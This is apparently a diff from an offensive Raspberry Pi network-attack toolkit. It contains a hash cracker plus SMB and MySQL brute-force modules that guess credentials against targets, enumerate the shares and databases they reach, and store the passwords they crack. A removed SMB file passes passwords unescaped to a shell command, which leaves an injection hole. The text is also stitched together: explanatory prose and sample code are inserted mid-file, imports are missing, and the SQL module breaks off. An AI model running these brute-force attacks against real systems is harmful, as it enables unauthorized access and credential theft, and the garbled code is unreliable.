from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
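The hash-type table above can be exercised standalone. Note that `md5` and `ntlm` are both 32 hex characters, so length alone cannot distinguish them, which is why the cracker tries every candidate type:

```python
import hashlib
import re

# Same patterns as HASH_PATTERNS above.
HASH_PATTERNS = {
    "md5": r"^[a-fA-F0-9]{32}$",
    "sha1": r"^[a-fA-F0-9]{40}$",
    "sha256": r"^[a-fA-F0-9]{64}$",
    "sha512": r"^[a-fA-F0-9]{128}$",
    "ntlm": r"^[a-fA-F0-9]{32}$",
}
hv = hashlib.sha256(b"secret").hexdigest()  # 64 hex chars
candidates = [t for t, pat in HASH_PATTERNS.items() if re.match(pat, hv)]
print(candidates)  # → ['sha256']
```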
class RuneCracker:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hashes: Set[str] = set()
self.cracked: Dict[str, Dict[str, Any]] = {}
self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Performance tuning for Pi Zero 2
self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
def _hash_password(self, password: str, h_type: str) -> Optional[str]:
"""Generate hash for a password using specified algorithm."""
try:
if h_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif h_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif h_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif h_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None
def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Worker function for cracking passwords."""
if self.shared_data.orchestrator_should_exit:
return
for h_type in HASH_PATTERNS.keys():
if self.hash_type and self.hash_type != h_type:
continue
hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
with self.lock:
if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try:
with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
for line in f:
hv = line.strip()
if not hv: continue
# Auto-detect or validate
for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
break
except Exception as e:
logger.error(f"Error loading hashes: {e}")
return "failed"
if not self.hashes:
logger.warning("No valid hashes found in input file.")
return "failed"
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False, cancel_futures=True)  # Py3.9+: drop queued candidates instead of draining them
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e:
logger.error(f"Cracking engine error: {e}")
return "failed"
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")
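The digest logic in `_hash_password` can be exercised on its own; below is a minimal standalone sketch using only the stdlib. The `HASH_PATTERNS` subset is copied from the module, the `hash_password` helper is a simplified stand-in, and NTLM/md4 is deliberately left out because `hashlib` support for md4 depends on the local OpenSSL build.

```python
import hashlib
import re

# Subset of rune_cracker.py's HASH_PATTERNS (NTLM/md4 omitted: it requires
# OpenSSL legacy providers and may be unavailable on modern systems)
HASH_PATTERNS = {
    'md5': r'^[a-fA-F0-9]{32}$',
    'sha256': r'^[a-fA-F0-9]{64}$',
}

def hash_password(password: str, h_type: str) -> str:
    # Same digest logic as RuneCracker._hash_password for the common types
    return getattr(hashlib, h_type)(password.encode()).hexdigest()

hv = hash_password('password', 'md5')
assert re.match(HASH_PATTERNS['md5'], hv)
print(hv)  # 5f4dcc3b5aa765d61d8327deb882cf99
```

Candidate hashes are then simply compared against the loaded `self.hashes` set, which is why the cracker's per-password cost is one digest per enabled hash type.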

File diff suppressed because it is too large

381
actions/smb_bruteforce.py Normal file

@@ -0,0 +1,381 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets provided by the orchestrator (ip, port)
- IP -> (MAC, hostname) resolved from DB.hosts
- Successes stored in DB.creds (service='smb'), one row PER SHARE (database=<share>)
- Keeps the queue/thread logic and signatures. No more rich/progress.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # max 3 runs per day
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Wrapper orchestrateur -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Lance le bruteforce SMB pour (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = ["smbclient", "-L", adresse_ip, "-U", f"{user}%{password}"]
process = None
try:
# shell=False (argument list) avoids breakage/injection when passwords contain shell metacharacters
process = Popen(cmd, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))  # dict phase + fallback phase + smbclient -L retry (dict passwords only)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- DB persistence ----------
def save_results(self):
# insert self.results into creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # use the 'database' column to distinguish shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# no longer needed with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
# Standalone mode not used in production; kept simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
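The `parse_shares` filtering above can be checked standalone; here is a sketch that mirrors its behavior against a simplified, unindented `smbclient -L` sample (real output is indented and richer, so treat the sample string as illustrative only):

```python
# Standalone mirror of SMBConnector.parse_shares: skip the header/divider
# lines and the generic administrative shares.
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}

def parse_shares(smbclient_output):
    shares = []
    for line in smbclient_output.splitlines():
        if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
            parts = line.split()
            if parts and parts[0] not in IGNORED_SHARES:
                shares.append(parts[0])
    return shares

sample = "Sharename Type Comment\n--------- ---- -------\npublic Disk\nIPC$ IPC\n"
print(parse_shares(sample))  # ['public']
```

Only the first whitespace-separated token of each data line is kept, which is why share names containing spaces would need quoting-aware parsing.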


@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

304
actions/sql_bruteforce.py Normal file

@@ -0,0 +1,304 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) from the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Connect without selecting a DB, then SHOW DATABASES; one entry per database found
- Successes -> DB.creds (service='sql', database=<db>)
- Keeps the logic (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # max 3 runs per day
class SQLBruteforce:
"""Wrapper orchestrateur -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Lance le bruteforce SQL pour (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connect without selecting a DB, then SHOW DATABASES; returns (True, [dbs]) or (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
